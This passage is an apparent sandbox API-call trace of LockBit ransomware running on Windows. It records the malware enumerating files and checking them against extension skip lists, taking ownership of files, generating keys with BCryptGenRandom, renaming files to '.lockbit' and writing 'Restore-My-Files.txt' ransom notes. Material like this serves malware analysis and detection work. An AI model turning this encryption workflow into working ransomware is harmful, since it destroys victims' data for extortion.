lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.963] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.964] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.964] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] lstrcmpiW (lpString1="ntldr", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] lstrcmpiW (lpString1="bootsect.bak", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] lstrcmpiW (lpString1="autorun.inf", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] lstrcmpiW (lpString1="thumbs.db", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] lstrcmpiW (lpString1="iconcache.db", lpString2="Title_Page_PAL.wmv") returned -1 [0082.965] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.965] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned=".wmv" [0082.965] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.965] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.965] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.966] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.967] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.967] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.967] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.lockbit") returned 83 [0082.967] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.968] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.968] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.968] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.968] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.969] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.969] RtlFreeAnsiString (AnsiString="\\") [0082.969] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.969] malloc (_Size=0x200) returned 0x77d800 [0082.969] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.969] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.969] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.969] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.970] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.970] CloseHandle (hObject=0x3bc) returned 1 [0082.970] free (_Block=0x77d800) [0082.970] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.970] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.970] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.970] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=1901316) returned 1 [0082.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.972] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.983] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.983] malloc (_Size=0xbc) returned 0x77d800 [0082.983] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0082.984] free (_Block=0x77d800) [0082.984] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.984] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.984] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.984] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70588d13, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70588d13, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e1a789b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xad264, dwReserved0=0x0, dwReserved1=0x0, cFileName="title_trans_notes.wmv", cAlternateFileName="")) returned 1 [0082.984] lstrcmpiW (lpString1=".", lpString2="title_trans_notes.wmv") returned -1 [0082.984] lstrcmpiW (lpString1="..", lpString2="title_trans_notes.wmv") returned -1 [0082.984] PathFindExtensionW (pszPath="title_trans_notes.wmv") returned=".wmv" [0082.984] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.984] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.984] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.984] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.984] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.985] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.986] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.986] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="title_trans_notes.wmv") returned -1 [0082.986] lstrcmpiW (lpString1="ntldr", lpString2="title_trans_notes.wmv") returned -1 [0082.986] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="title_trans_notes.wmv") returned -1 [0082.986] lstrcmpiW (lpString1="bootsect.bak", lpString2="title_trans_notes.wmv") returned -1 [0082.986] lstrcmpiW (lpString1="autorun.inf", lpString2="title_trans_notes.wmv") returned -1 [0082.987] lstrcmpiW (lpString1="thumbs.db", lpString2="title_trans_notes.wmv") returned -1 [0082.987] lstrcmpiW (lpString1="iconcache.db", lpString2="title_trans_notes.wmv") returned -1 [0082.987] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.987] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned=".wmv" [0082.987] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.987] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.987] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.988] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.988] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv.lockbit") returned 86 [0082.988] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.000] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.000] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.000] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.000] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.000] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.000] RtlFreeAnsiString (AnsiString="\\") [0083.000] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.000] malloc (_Size=0x200) returned 0x77d800 [0083.001] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.001] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.001] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.001] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.001] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.002] CloseHandle (hObject=0x3b8) returned 1 [0083.002] free (_Block=0x77d800) [0083.002] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.002] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.002] malloc (_Size=0x40068) returned 0x1ff1e60 [0083.002] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=709220) returned 1 [0083.002] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0083.003] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.003] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.003] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0083.003] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0083.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.249] malloc (_Size=0xc2) returned 0x77d800 [0083.249] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0083.264] free (_Block=0x77d800) [0083.265] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0083.265] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0083.265] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.265] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x705fb12a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x705fb12a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e1f3b57, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb4f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_Trans_Notes_PAL.wmv", cAlternateFileName="")) returned 1 [0083.265] lstrcmpiW (lpString1=".", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.265] lstrcmpiW (lpString1="..", lpString2="Title_Trans_Notes_PAL.wmv") returned -1 [0083.265] PathFindExtensionW (pszPath="Title_Trans_Notes_PAL.wmv") returned=".wmv" [0083.265] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.265] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.266] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.266] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.266] 